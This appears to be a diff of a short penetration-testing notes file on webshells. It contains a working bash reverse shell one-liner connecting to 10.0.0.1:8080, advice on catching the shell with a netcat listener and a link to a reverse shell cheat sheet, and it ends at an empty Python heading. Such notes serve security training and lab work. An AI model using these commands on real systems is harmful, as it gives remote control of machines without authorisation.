cs4p/cscs/webshells.md

 Make sure commands are URL encoded

 # Reverse shell commands
+These commands can be passed as the payload once you ahve a webshell to create a more persistent shell.
+Make sure to create a corresponding listening service using netcat to catch the shell.

 https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

 ## Bash
     bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
 ## Python